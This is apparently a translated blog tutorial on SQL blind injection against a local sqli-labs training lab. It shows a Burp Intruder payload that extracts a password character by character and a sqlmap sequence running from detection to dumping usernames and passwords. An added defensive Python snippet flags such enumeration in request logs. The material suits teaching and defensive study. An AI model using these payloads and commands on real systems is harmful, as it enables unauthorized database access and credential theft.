[Tools] Running SQL blind injection
2022-07-03 04:38:00 【Black zone (rise)】
Contents
1. (Tool) Blind injection with Burp
1.2 Method 2: Enumerating with an injected statement
2. (Tool) Boolean blind injection with sqlmap
Step 1: Detect whether an injection exists
Step 2: Enumerate database names
Step 3: Enumerate table names
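1. (Tool) Blind injection with Burp
1.1 Method 1: Brute force
After capturing the request, send it to the "Intruder" module.
Configure 2 payload sets.
1.2 Method 2: Enumerating with an injected statement
Construct an injection statement and iterate over its two payload positions: §0§ is the candidate character and §1§ is the character position.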
(select case when '§0§' = lower(substring((select password from employees where empid=1),§1§,1)) then 1 else 0 end)
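Seen from the server side, the iteration above shows up as many requests from one client to the same parameter, each reading a single character at a different position. The following added example (not part of the original post) flags that pattern in request logs; the log format, addresses, paths and function names are assumptions made for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, quote, urlsplit

# Matches substring-style calls that read one character at a numeric position,
# e.g. substring((select ...),3,1); the position is captured.
PROBE = re.compile(r"\b(?:substring|substr|mid)\s*\(.*,\s*(\d+)\s*,\s*1\s*\)",
                   re.I | re.S)

# The statement from section 1.2, with the two Intruder markers as fields.
PAGE_STATEMENT = ("(select case when '{c}' = lower(substring((select password "
                  "from employees where empid=1),{p},1)) then 1 else 0 end)")


def sample_log():
    """Constructed log lines in the assumed form '<client> <request target>'."""
    lines = [f"10.0.0.7 /item?id={quote(PAGE_STATEMENT.format(c=c, p=p))}"
             for p in range(1, 5) for c in "ab"]
    lines += [
        "10.0.0.9 /item?id=1",
        "10.0.0.9 /search?q=substring+function+in+mysql",      # benign text
        "10.0.0.8 /item?id=" + quote("substring('abc',2,1)"),  # single probe
        "garbage-line-without-target",
    ]
    return lines


def find_blind_enumeration(lines, min_positions=3):
    """Return {(client, path, param): stats} for clients walking positions."""
    seen = defaultdict(lambda: {"probes": 0, "positions": set()})
    for line in lines:
        parts = line.split(None, 1)
        if len(parts) != 2:
            continue  # skip malformed lines
        client, target = parts
        url = urlsplit(target.strip())
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            match = PROBE.search(value)  # parse_qsl has URL-decoded the value
            if match:
                entry = seen[(client, url.path, name)]
                entry["probes"] += 1
                entry["positions"].add(int(match.group(1)))
    return {key: stats for key, stats in seen.items()
            if len(stats["positions"]) >= min_positions}


if __name__ == "__main__":
    for key, stats in find_blind_enumeration(sample_log()).items():
        print(key, stats["probes"], sorted(stats["positions"]))
```

The threshold on distinct positions, rather than on a single keyword hit, is what keeps the benign search and the one-off request out of the result.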
2. (Tool) Boolean blind injection with sqlmap
2.1 Commands:
-u specify the injection point (target URL)
--dbs enumerate database names
--tables enumerate table names
--columns enumerate column names
--dump dump the data
After each item has been enumerated, add the next selector in turn: -D for the database, -T for the table, -C for the columns.
2.2 Workflow:
Step 1: Detect whether an injection exists
Example:
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' --batch
--batch accepts the default answer to every prompt.
The scan has in fact already identified the environment,
so you can add --dbms mysql to later runs.
Step 2: Enumerate database names
Commands:
# Get all databases
sqlmap.py -u url --dbs --batch
---------
# Get the current database
sqlmap.py -u url --current-db --batch
Example:
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' --dbs --batch
Step 3: Enumerate table names
Command:
python sqlmap.py -u url -D DB --tables --batch
Example:
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security --tables --batch
Step 4: Enumerate column names
Command:
sqlmap.py -u url -D DB -T TBL --columns --batch
Example:
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security -T users --columns --batch
Step 5: Dump the data
Command:
sqlmap.py -u url -D DB -T TBL -C "COL1,COL2" --dump --batch
Example:
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security -T users -C "username,password" --dump --batch
3. Recommended reading
【SQL Injection - No echo】 Boolean blind injection: principle, functions, usage
【SQL Injection - With echo】 DNS request injection: principle, platforms, usage, configuration